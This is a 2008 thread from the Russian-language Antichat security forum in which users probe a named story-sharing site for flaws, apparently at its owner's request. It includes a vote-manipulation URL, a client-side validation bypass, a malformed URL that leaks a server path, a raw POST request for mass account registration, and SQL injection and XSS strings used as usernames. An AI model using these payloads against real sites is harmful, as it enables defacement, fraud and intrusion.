ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 01.08.2008, 22:01
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

В добавлении нового рассказа фильтрация только на стороне клиента, мона заслать оч длинный текст ..

было
<textarea class="add border" id="addvariant" onchange="validate('addvariant')" onkeyup="validate('addvariant')"></textarea>

стало
<textarea class="add border" id="addvariant"></textarea>
 
Ответить с цитированием

  #12  
Старый 01.08.2008, 22:12
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839

Репутация: 1502


По умолчанию

Цитата:
Сообщение от BlackSun  
http://concept.ds8.ru/addvoce.php?story={id рассказа}&b=999999
Итого: рейтинг у рассказа - 999999
гы гы: http://concept.ds8.ru/addvoce.php?story={id рассказа}&b=-999999
и облом твоим стараниям))
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием

  #13  
Старый 04.08.2008, 09:57
dimankoresh
Новичок
Регистрация: 31.07.2008
Сообщений: 4
Провел на форуме:
9364

Репутация: 0
По умолчанию

вроде всё поправил) спасибо за глюки, недосмотрел, если не лень проверте ещё разок)
 
Ответить с цитированием

  #14  
Старый 04.08.2008, 10:21
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

http://concept.ds8.ru/erotic/comments_"><>

Цитата:
Warning: DOMDocument::loadXML() [domdocument.loadxml]: Unescaped '<' not allowed in attributes values in Entity, line: 50 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

Warning: DOMDocument::loadXML() [domdocument.loadxml]: attributes construct error in Entity, line: 50 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

Warning: DOMDocument::loadXML() [domdocument.loadxml]: Couldn't find end of Start Tag theway line 50 in Entity, line: 50 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

Warning: DOMDocument::loadXML() [domdocument.loadxml]: StartTag: invalid element name in Entity, line: 50 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76
 
Ответить с цитированием

  #15  
Старый 21.08.2008, 08:45
dimankoresh
Новичок
Регистрация: 31.07.2008
Сообщений: 4
Провел на форуме:
9364

Репутация: 0
По умолчанию

Цитата:
Сообщение от BlackSun  
http://concept.ds8.ru/erotic/comments_"><>
спасиб
 
Ответить с цитированием

  #16  
Старый 21.08.2008, 09:55
TR0J@N
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
Провел на форуме:
1449774

Репутация: 127
Отправить сообщение для TR0J@N с помощью ICQ
Exclamation

Регаем армию писателей)
Код:
POST http://concept.ds8.ru/registration HTTP/1.0
Accept: */*
Referer: http://concept.ds8.ru/registration
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0
Host: concept.ds8.ru
Content-Length: 127
Pragma: no-cache
Cookie: PHPSESSID=

login=ЛОГИН&pass=ПАРОЛЬ&pass2=ПАРОЛЬ&email=МЫЛО&capcha=&reg_in=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C
 
Ответить с цитированием

  #17  
Старый 21.08.2008, 09:55
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Я чего-то натворил..
Регнулся под '+or+1=1/* и под '"/><script>alert(/1/)</script> и на главной теперь неверно ведуться ссылки на последние каменты, рассказы и прочее
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Диски Fujitsu MHZ2 BK/BS: когда надёжность - на первом месте xGOR Новости мира "железа" 0 21.05.2008 21:10
Проверте на Уязвимость!! Партизан Чаты 11 03.09.2005 23:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ